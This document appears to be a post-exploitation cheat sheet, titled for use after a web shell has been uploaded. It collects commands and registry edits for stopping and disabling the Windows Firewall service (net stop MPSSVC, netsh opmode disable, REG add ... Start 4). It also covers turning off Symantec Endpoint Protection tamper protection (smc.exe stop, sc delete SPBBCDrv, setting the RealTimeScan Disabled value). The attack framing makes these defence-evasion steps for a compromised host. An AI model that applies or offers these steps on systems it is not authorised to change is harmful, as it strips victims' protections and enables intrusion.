Post web shell upload exploitation

Manually stopping the Windows Authenticating Firewall Service (Source)

There are multiple ways to manually stop the Windows Firewall:

• In the Firewall CPL in control panel
• In the Advanced Firewall MMC
• In the Services Manger MMC
• Netsh Firewall set opmode disable
• Net stop MPSSVC or net stop sharedaccesss (Depending on the OS)

One of the more common methods to use to stop the firewall service as a test is to use Net stop MPSSVC (for Windows Vista) or Net stop SharedAccess (for Windows XP) but both of these will cause the boot-time filters to load. The proper way to completely stop the firewall is by setting the service to disabled in Services Manager and then stopping the service through one of the GUIs or Netsh. This will prevent the boot-time filters from loading when the firewall service is stopped.

Figure 1. Setting the firewall service to disabled in Services manger.

To change Startup Type (source):
Automatic:REG add "HKLM\SYSTEM\CurrentControlSet\services\MpsSvc" /v Start /t REG_DWORD /d 2 /f
Manual:REG add "HKLM\SYSTEM\CurrentControlSet\services\MpsSvc" /v Start /t REG_DWORD /d 3 /f
Disabled:REG add "HKLM\SYSTEM\CurrentControlSet\services\MpsSvc" /v Start /t REG_DWORD /d 4 /f
Automatic (Delayed Start):REG add "HKLM\SYSTEM\CurrentControlSet\services\MpsSvc" /v Start /t REG_DWORD /d 2 /f
Note: When you change to Automatic (Delayed Start) a new key DelayedAutostart is created with value 1.REG add "HKLM\SYSTEM\CurrentControlSet\services\MpsSvc" /v DelayedAutostart /t REG_DWORD /d 1 /f
When you change to Automatic from Automatic (Delayed Start), DelayedAutostart change value to 0.
REG add "HKLM\SYSTEM\CurrentControlSet\services\MpsSvc" /v DelayedAutostart /t REG_DWORD /d 0 /f

Disable Symantec Tamper Protection (source)

smc.exe <-p passwordOptional> stop 

Stop also ccSvcHst.exe    

  Investigate on C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.2015.2015.105\Bin\sms.dll

 

The easiet way is to diable it via registry
navigate to 
HKEY_LOCAL_MACHINE\SOFTWARE\Symantec\Symantec Endpoint Protection\AV\Storages\SymProtect\RealTimeScan
on the right handside you will find a key called Disabled.
If itts 1---tamper protection is disabled
if its 0 - tamper protection is enabled
run this , before install, should take care of the issue. Let me know if you have any other questions / concerns

 

 sc delete SPBBCDrv

it will delete the Tamper Protection service and will change its start value to 4 = disabled

Hello Jetjaguar,

I should have mentioned it before
in sav you will find all the keys under 
intel\landesk,
here is the complete path for SAV

HKEY_LOCAL_MACHINE\SOFTWARE\Intel\LANDesk\VirusProtect6\CurrentVersion\Storages\SymProtect\RealTimeScan

you can disable this under registry

Tamper protection wont prevent registry changes.

regedit

hkey/localmachine/symantec/symantec endpoint protection/av/storages/symprotect/real time scan on the right hand side make the disabled key to 1.

Here is a Workaround to Disable the Tamper Protection from SPC 12

Start > Run > regedit

Click OK

Browse to:

HKLM\SOFTWARE\Symantec\Symantec Endpoint Protection\AV\Storages\SymProtect\RealTimeScan\Disabled

By default, Tamper protection is enabled and ON.
This will be shown as Disabled REG_DWORD 0x00000000 (0)
Disabled = 0

For disabling Tamper protection (OFF), edit the registry value and set it to 1
This will be shown as Disabled REG_DWORD 0x00000000 (1)
Disabled = 1

Steps to change this registry value:

Right-click [Disabled] and select Modify
Change Value data from 0 to 1

Please Note:

When making this change to the registry for this setting it will only be temporary.
If, for example, SMC service is restarted, this value will change back to the default value of 0 <= (TP = enabled = ON). There is no way to permanently set this value in SEP SBE.